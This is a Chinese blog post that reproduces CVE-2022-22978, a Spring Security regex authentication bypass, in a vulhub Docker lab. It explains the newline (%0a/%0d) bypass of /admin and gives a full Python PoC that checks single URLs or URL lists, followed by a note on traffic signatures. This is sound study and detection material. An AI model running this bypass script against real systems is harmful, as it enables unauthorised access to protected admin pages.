CVE-2022-22978 Spring Security身份验证绕过漏洞复现及与poc利用

最新推荐文章于 2024-04-09 15:51:10 发布
最新推荐文章于 2024-04-09 15:51:10 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: spring 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwy15288408160/article/details/131850711
版权

目录

前言

一、环境搭建

二、漏洞触发点原理分析

三、poc验证

总结

前言

        在Spring Security 5.5.7之前、5.6.4 之前以及不受支持的旧版本中,使用正则表达式中包含". "的RegexRequestMatcher的应用程序易被换行符\r(%0a)、回车符\n(%0d)绕过,可利用此漏洞在未授权的情况下绕过身份认证,导致配置的权限验证失效。

受影响版本

  • Spring Security 5.5.x < 5.5.7
  • Spring Security 5.6.x < 5.6.4
  • 以及其它不受支持的旧版本

一、环境搭建

使用vulhub中构建好的CVE-2022-22978的docker环境进行漏洞POC验证。

(前提:需要安装好docker以及docker-compose工具,安装链接:Ubuntu Docker 安装 | 菜鸟教程 (runoob.com)

1. 下载解压vulhub

        wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
        unzip vulhub-master.zip

2.  进入漏洞环境并使用docker-compose启动

cd spring/cve-2022-22978

systemctl start docker

docker-compose build   #构建自动化编译环境

docker-compose up -d

        

 3.访问靶场http://ip:8080,搭建成功

二、漏洞触发点原理分析

        漏洞位于org.springframework.security.web.util.matcher.RegexRequestMatcher#matches方法中,默认情况下,正则表达式"."会匹配除换行符(如 \n、\r)之外的所有字符。在用正则表达式函数验证字符串的模式时,如果字符串中存在换行符,该正则表达式函数将不匹配。若使用%0d代替\n或%0a代替\r,就能绕过正则表达式匹配。

        正常访问admin页面,因为没有经过身份认证,会被禁止;加上换回车符\n后正则表达式不会匹配;

        将换行符\n用%0d代替,就能绕过正则表达式匹配,成功访问admin页面

三、poc验证

       该poc通过构造GET请求包,在url中拼接管理员目录/admin以及换行符%0a或回车符%d后向目标url发起攻击,若响应消息状态码为200,则判定为攻击成功,漏洞存在。

完整poc:

#本poc仅供学习使用,禁止用于非法行为,否则后果自负

import argparse
import requests


# 创建命令行参数解析器
parser = argparse.ArgumentParser(description='Example script to process command line arguments.')
# 添加命令行选项
parser.add_argument('-u', '--url', help='URL argument,eg:http://192.168.1.1:port')
parser.add_argument('-f', '--file', help='FILE argument,eg:url.txt')
# 解析命令行参数
args = parser.parse_args()
# 获取URL或URL文件
url = args.url
file = args.file

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}
payload = '/admin/%0a%0d'

def exploit_file(file):
    with open(file, 'r') as urls:
        for url in urls:
            url = url.replace('\n', "")
            if url.endswith('/'):
                url = url.rstrip('/')
            if not url.strip():  # 检查是否为空行
                continue
            url_check = url + payload
            response = requests.get(url=url_check, headers=header, timeout=3)
            if response.status_code == 200:
                print(url + "   Vulnerability exists!")



def exploit_url(url):
    if url.endswith('/'):
        url = url.rstrip('/')
    url_check = url + payload
    response = requests.get(url=url_check, headers=header, timeout=3)
    if response.status_code == 200:
        print(url + "   Vulnerability exists!")


def process_input(args):
    if args.url is None:
        # 参数是一个文件路径
        exploit_file(file)
    elif args.file is None:
        # 参数是一个URL
        exploit_url(url)
    else:
        # 错误情况:两者都提供了参数
        raise ValueError("Please provide the -u or -f parameter")


if __name__ == '__main__':
    process_input(args)

参数选项 【-u】指定目标url

               【-f】指定url合集(前提是同一目录下需要有url.txt文件)

python poc.py -u <url>

python poc.py -f <url.txt>

执行后会返回漏洞情况,漏洞存在返回“Vulnerability exists!”,漏洞不存在则报错。

 四、攻击流量分析

        根据分析可得,该漏洞poc的流量特征为HTTP GET请求的url中包含管理员目录/admin以及用于绕过正则匹配的换行符(%0a)或回车符(%0d),经验证,同时使用%0a%0d也可成功绕过。

        在poc脚本运行时,使用tcpdump -i eth0 -w xxx.pcap抓包。

总结

本文简单介绍了CVE-2022-22978的原理、环境搭建及简单利用。需要安装docker和vulhub。本着“生活就是解决各种疑难杂症”的思想,任何问题都能一一解决。

WeiYweiy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CVE-2022-22978 Spring-security 认证绕过漏洞分析和漏洞挖掘思考
Q54665642ljf的博客
09-08 6254
在此之前,已经对CVE-2022-32532 Apache Shiro RegExPatternMatcher 认证绕过漏洞进行了分析,它和CVE-2022-22978漏洞产生原理上,本质是一样的。在分析这两个漏洞后,结合今年kcon议题《自动化API漏洞Fuzz实战》,产生了对漏洞挖掘关注点的一些思考。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Centos7服务器同步网络发现漏洞与修复手册(每周更新3次)_cve-2024-2828
最新发布
2401_84160325的博客
04-09 1005
作者公司有8台云服务器,本地有2台物理服务器,并且都联网了。云服务器的安全防护到期了,公司也不太想续费了,遂自己从代码上添加了一系列软件防护,但漏洞是一直再出,谁也无法保障是永远安全,所以本文会持续收录及时的漏洞,并提供命令修复办法。软件: kernel-headers, 版本: 3.10.0-1160.83.1.el7修复命令 sudo yum update kernel-headers软件: libssh2, 版本: 1.8.0-4.el7修复命令 sudo yum update libssh2软件:
spring security regexrequestmatcher 认证绕过漏洞CVE-2022-22978
qq_41950855的博客
10-18 4340
记录一次漏洞修复过程中遇到的问题:spring security regexrequestmatcher 认证绕过漏洞CVE-2022-22978
解决CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞
培根芝士的专栏
09-24 2888
Spring 官方通报了一个 Spring Security 框架的认证绕过漏洞 CVE-2022-22978 :因为 `RegexRequestMatcher` 正则表达式处理的特性,导致可能某些需要认证的 `Servlet` 被绕过
CVE-2022-22978Spring-security认证绕过漏洞
Dawn3AM
10-07 763
Spring-security使用 RegexRequestMatcher 进行权限配置,由于RegexRequestMatcher正则表达式配置权限的特性,正则表达式中包含“.”时,未经身份验证攻击者可以通过构造恶意数据包绕过身份认证。程序在处理该路径的访问请求时,会利用正则规则匹配该路径是否为管理员路径,如果是则对其进行身份校验,校验通过后,返回管理端数据,但是如果正则规则未匹配到该路径,则直接绕过身份校验模块。,经过WEB服务器转码成换行符。HTTP请求中url中的。,即可绕过访问权限检测。
CVE-2022-22978-Spring-security认证绕过漏洞
weixin_59474029的博客
08-21 334
由于漏洞位于org.springframework.security.web.util.matcher.RegexRequestMatcher#matches⽅法中,默认情况下,正则表达式"."会匹配除换⾏符(如 \n、\r)之外的所有字符。在⽤正则表达式函数验证字符串的模式时,如果字符串中存在换⾏符,该正则表达式函数将不匹配。若使⽤%0d代替\n或%0a代替\r,就能绕过正则表达式匹配。只需在admin路径后加上%0a或%0d,即可绕过正则表达式匹配,成功访问到admin⻚⾯。
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
CVE-2022-22978 Spring-security 认证绕过漏洞复现
热爱学习,喜欢折腾!
10-07 2199
Spring Security是一个功能强大且高度可定制的身份验证和访问控制框架。5月16日,VMware发布安全公告,修复了Spring Security中的一个认证绕过漏洞CVE-2022-22978),该漏洞的CVSSv3评分为8.2。在Spring Security 版本5.5.7之前、5.6.4 之前以及不受支持的旧版本中,使用正则表达式中包含". "的RegexRequestMatcher的应用程序容易导致绕过,可利用漏洞在未授权的情况下绕过身份认证,导致配置的权限验证失效。
spring系列漏洞复现CVE-2022-22947、CVE-2022-22963、CVE-2022-22965、CVE-2022-22978
unlash的博客
09-23 199
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现 修复建议 Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现 修复建议 Spring Framework远程代码执行(CVE-2022-22965)漏洞复现 修复建议 Spring-security 认证绕过CVE-2022-22978漏洞复现 修复建议
云服务--漏洞修复
Knight_Key的博客
11-18 1951
Spring Security 身份认证绕过漏洞(CVE-2022-22978) FastJSON<=1.2.80 反序列化漏洞(CVE-2022-25845) Apache Commons Text
Spring Security身份验证绕过漏洞CVE-2023-34035
日拱一卒无有尽,功不唐捐终入海
09-15 1008
背景:公司收到关于 Spring Security 的一个身份验证绕过漏洞的通知,该漏洞被标识为 CVE-2023-34035CVE-2023-34034:WebFlux使用未加前缀的双通配符模式绕过安全性Spring 建议采取以下两步缓解措施:步骤 1:升级到最新版本的 Spring Security(6.1.2 / 6.0.5 / 5.8.5)。链接:https://spring.io/projects/spring-security请按照此错误消息进行操作。
SpringSecurity权限控制
qq_61544409的博客
03-21 6593
Spring 是非常流行和成功的 Java 应用开发框架,Spring Security 正是 Spring 家族中的成员。Spring Security 基于 Spring 框架,提供了一套 Web 应用安全性的完整解决方案。 正如你可能知道的关于安全方面的两个核心功能是“认证”和“授权”,一般来说,Web 应用的安全性包括用户认证(Authentication)和用户授权(Authorization)两个部分,这两点也是 SpringSecurity 重要核心功
Springboot集成security,自定义@Anonymous标签实现免登录,免鉴权
evil_lrn的博客
02-16 5045
首先,项目springboot使用了2.6.8版本,集成security的过程中,使用了比较严格的自定义策略,任何请求都需要认证和授权,判断用户是否有查询改接口的权限。并且提供了配置或者注解两种方式提供匿名访问的接口。引起需要收集@Anonymous注解标注的controller。于是就像参照spring启动扫描注解的方式实现,然后自定义了。参照spring scan。第二种使用自定义注解。
Spring RCE远程执行漏洞CVE-2022-22965)
tpaer的博客
10-18 2437
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
2.2CVE-2022-34918漏洞复现技术原理
06-10
由于CVE-2022-34918是一种nftables堆溢出漏洞,需要构造特定的nftables规则才能触发漏洞,因此复现漏洞需要具备一定的技术水平。 具体来说,复现CVE-2022-34918漏洞的步骤如下: 1. 搭建测试环境:需要在一台Linux系统上搭建nftables环境,以及安装一些必要的工具,如gcc、make、gdb等。 2. 构造恶意规则:需要构造一个特定的nftables规则,以触发CVE-2022-34918漏洞。具体来说,可以通过在规则中使用特定的操作符和参数,向nftables传递恶意数据,从而导致堆溢出。 3. 触发漏洞:使用nft命令加载并执行构造好的恶意规则,从而触发CVE-2022-34918漏洞。 4. 利用漏洞:如果漏洞成功触发,可以使用一些调试工具如gdb来进一步分析漏洞,并尝试利用漏洞执行任意代码或者进行拒绝服务攻击。 需要注意的是,复现CVE-2022-34918漏洞需要具备一定的技术水平,同时需要谨慎操作,以免对测试环境和实际系统造成不必要的影响。建议仅在专业人士的指导下进行相关操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WeiYweiy

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值